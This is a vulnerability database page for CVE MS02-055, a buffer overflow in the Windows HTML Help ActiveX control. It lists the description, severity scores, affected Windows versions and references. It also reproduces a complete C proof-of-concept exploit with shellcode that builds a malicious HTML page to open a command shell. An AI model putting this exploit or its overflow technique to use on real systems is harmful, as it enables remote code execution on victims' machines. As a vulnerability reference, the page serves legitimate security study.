Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Buffer overflow in the HTML Help ActiveX Control (hhctrl.ocx) in Microsoft Windows 98, 98 Second Edition, Millennium Edition, NT 4.0, NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute code via (1) a long parameter to the Alink function, or (2) script containing a long argument to the showHelp function.
CVE Informations
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 21902
Publication date : 2002-10-06 22h00 +00:00
Author : ipxodi
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/5874/info
The ActiveX control that provides much of the functionality for the Windows Help Center contains an unchecked buffer. Successful exploitation could result in execution of arbitrary code in the security context of the current user.
/*
By ipxodi@whitecell.org 10.07.2002
prove of concept code of Windows Help buffer overflow.
Bug discovered by
For tech detail see "Thor Larholm security advisory TL#004".
To Use:
cl ex.c
Run as:
ex > ex.htm
start ex.htm (be sure to set iexplore as your default htm viewer.)
You will get a cmd shell.
Tested on IE 5.5, IE5.5 SP2, IE 6.0.
other version untested.
*/
#include <windows.h>
#include <stdio.h>
char shellcode[] = "\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x63\xC6\x45\xFD\x6D\xC6\x45\xFE\x64\x57\xC6\x45\xF8\x03" "\x80\x6D\xF8\x50"
"\x8D\x45\xFC\x50\x90\xB8" "EXEC" "\xFF\xD0\x33\xC0\x50\x90\xB8" "EXIT" "\xFF\xD0\xC3";
char shellcode_encode[] = "\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x63\xC6\x45\xFD\x6D\xC6\x45\xFE\x64\x57\xC6\x45\xF8\x53" "\x80\x6D\xF8\x50"
"\x8D\x45\xFC\x50\x90\xB8" "EXEC" "\x2C\x78" "\xFF\xD0" "\x41\x33\xC0\x50\x90\xB8""EXIT" "\x2C\x78" "\xFF\xD0\xC3";
void EncodeFuncAddr(char * shellcode,DWORD addr,char * pattern)
{
unsigned char * p ;
p = strstr(shellcode,pattern);
if(p) {
if( *(p+4) == '\xFF' )
memcpy(p,&addr,4);
else {
if((addr & 0xFF) > 0x80) {
memcpy(p,&addr,4);
*(p+4) = 0x90;
*(p+5) = 0x90;
}else {
addr += 0x78;
memcpy(p,&addr,4);
}
}
}
}
int ModifyFuncAddr(char * shellcode)
{
char * temp="0123456789ABCDEF";
HMODULE hdl;
unsigned char * p ;
DWORD pAddr_WinExec ,pAddr_Exit ;
hdl = LoadLibrary("kernel32.dll");
pAddr_WinExec = GetProcAddress(hdl,"WinExec");
pAddr_Exit = GetProcAddress(hdl,"ExitProcess");
fprintf(stderr,"Find WinExec at Address %x, ExitProcess at Address %x\n",pAddr_WinExec,pAddr_Exit);
EncodeFuncAddr(shellcode,pAddr_WinExec,"EXEC");
EncodeFuncAddr(shellcode,pAddr_Exit,"EXIT");
}
void Validate(char * shellcode)
{
unsigned char *p, *foo = "\\\/:*?\"<>|";
for(;*foo;foo++) {
p = strchr(shellcode,*foo);
if(p) {
fprintf(stderr,"ERROR:ShellCode Contains Invalid Char For File name: %s\n",p);
}
}
}
#define Valid(c) (c>0x30)
int FindCode(char * code)
{
DWORD addr;
unsigned char * p = (unsigned char * )LoadLibrary("kernel32.dll");
for(;p < 0x77f00000;p++)
if(memcmp(p,code,2)==0) {
fprintf(stderr,"Find Code at Address %x\n",p);
addr = (DWORD) p;
if( (addr &0xFF )>0x30 && ((addr>>8)&0xFF)>0x30&& ((addr>>16)&0xFF)>0x30 && ((addr>>24)&0xFF)>0x30 )
return p;
}
return 0;
}
int main(int argc, char ** argv)
{
char * prefix = "<script type=\"text/javascript\">showHelp(\"";
char *postfix = "\");</script>";
char buff[1024];
int mode = 2;
char * pCode = buff, *shell;
DWORD addr;
int offset = 784;
if(argc > 3 ) {
printf("Usage: %s [mode] [offset]",argv[0]);
printf("Normal: %s 1 784",argv[0]);
printf("Advanc: %s 2 784",argv[0]);
exit(0);
}else if(argc == 3 ) {
offset = atoi(argv[2]);
mode = atoi(argv[1]);
};
fprintf(stderr,"Mode %d, Using Offset %d\n",mode,offset);
memset(buff,0x41,1023);
memcpy(pCode, "A:\\\xC0",4); //cmp al,al as a nop.
switch(mode) {
case 1: shell = shellcode; break;
case 2: shell = shellcode_encode;break;
case 3: {
sprintf(buff +offset, "abcd");
printf("%s%s%s",prefix,buff,postfix);
return ;
}
}
ModifyFuncAddr(shell);
Validate(shell);
memcpy(pCode+0x10,shell,strlen(shell));
pCode = buff + offset;
addr = FindCode("\xFF\xE7"); // jmp edi
*(int*)pCode = addr ? addr : 0x77e79d02;
*(pCode+4)=0;
printf("%s%s%s",prefix,buff,postfix);
}
Products Mentioned
Configuraton 0
Microsoft>>Windows_2000 >> Version *
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version beta3 (Open CPE detail)
Microsoft>>Windows_2000 >> Version *
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
Microsoft>>Windows_2000 >> Version *
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
Microsoft>>Windows_2000 >> Version *
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
Microsoft>>Windows_2000_terminal_services >> Version *
- Microsoft>>Windows_2000_terminal_services >> Version - (Open CPE detail)
- Microsoft>>Windows_2000_terminal_services >> Version - (Open CPE detail)
- Microsoft>>Windows_2000_terminal_services >> Version - (Open CPE detail)
- Microsoft>>Windows_2000_terminal_services >> Version - (Open CPE detail)
Microsoft>>Windows_2000_terminal_services >> Version *
- Microsoft>>Windows_2000_terminal_services >> Version - (Open CPE detail)
Microsoft>>Windows_2000_terminal_services >> Version *
- Microsoft>>Windows_2000_terminal_services >> Version - (Open CPE detail)
Microsoft>>Windows_2000_terminal_services >> Version *
- Microsoft>>Windows_2000_terminal_services >> Version - (Open CPE detail)
Microsoft>>Windows_98 >> Version *
- Microsoft>>Windows_98 >> Version - (Open CPE detail)
Microsoft>>Windows_98se >> Version *
- Microsoft>>Windows_98se >> Version - (Open CPE detail)
Microsoft>>Windows_me >> Version *
- Microsoft>>Windows_me >> Version - (Open CPE detail)
- Microsoft>>Windows_me >> Version - (Open CPE detail)
- Microsoft>>Windows_me >> Version - (Open CPE detail)
Microsoft>>Windows_nt >> Version 4.0
Microsoft>>Windows_nt >> Version 4.0
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
Microsoft>>Windows_nt >> Version 4.0
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
Microsoft>>Windows_nt >> Version 4.0
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
Microsoft>>Windows_nt >> Version 4.0
Microsoft>>Windows_nt >> Version 4.0
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
Microsoft>>Windows_nt >> Version 4.0
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
Microsoft>>Windows_nt >> Version 4.0
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
Microsoft>>Windows_nt >> Version 4.0
Microsoft>>Windows_nt >> Version 4.0
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
Microsoft>>Windows_nt >> Version 4.0
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
Microsoft>>Windows_nt >> Version 4.0
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
Microsoft>>Windows_nt >> Version 4.0
Microsoft>>Windows_nt >> Version 4.0
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
Microsoft>>Windows_nt >> Version 4.0
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
Microsoft>>Windows_nt >> Version 4.0
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
Microsoft>>Windows_nt >> Version 4.0
Microsoft>>Windows_nt >> Version 4.0
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
Microsoft>>Windows_nt >> Version 4.0
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
Microsoft>>Windows_nt >> Version 4.0
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
Microsoft>>Windows_nt >> Version 4.0
Microsoft>>Windows_nt >> Version 4.0
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
Microsoft>>Windows_nt >> Version 4.0
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
Microsoft>>Windows_nt >> Version 4.0
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
Microsoft>>Windows_nt >> Version 4.0
Microsoft>>Windows_nt >> Version 4.0
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
Microsoft>>Windows_nt >> Version 4.0
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
Microsoft>>Windows_nt >> Version 4.0
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
Microsoft>>Windows_nt >> Version 4.0
Microsoft>>Windows_nt >> Version 4.0
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
Microsoft>>Windows_nt >> Version 4.0
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
Microsoft>>Windows_nt >> Version 4.0
- Microsoft>>Windows_nt >> Version 4.0 (Open CPE detail)
Microsoft>>Windows_xp >> Version *
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version *
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version *
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
References
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A374
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2002/ms02-055
Tags : vendor-advisory, x_refsource_MS
Tags : vendor-advisory, x_refsource_MS
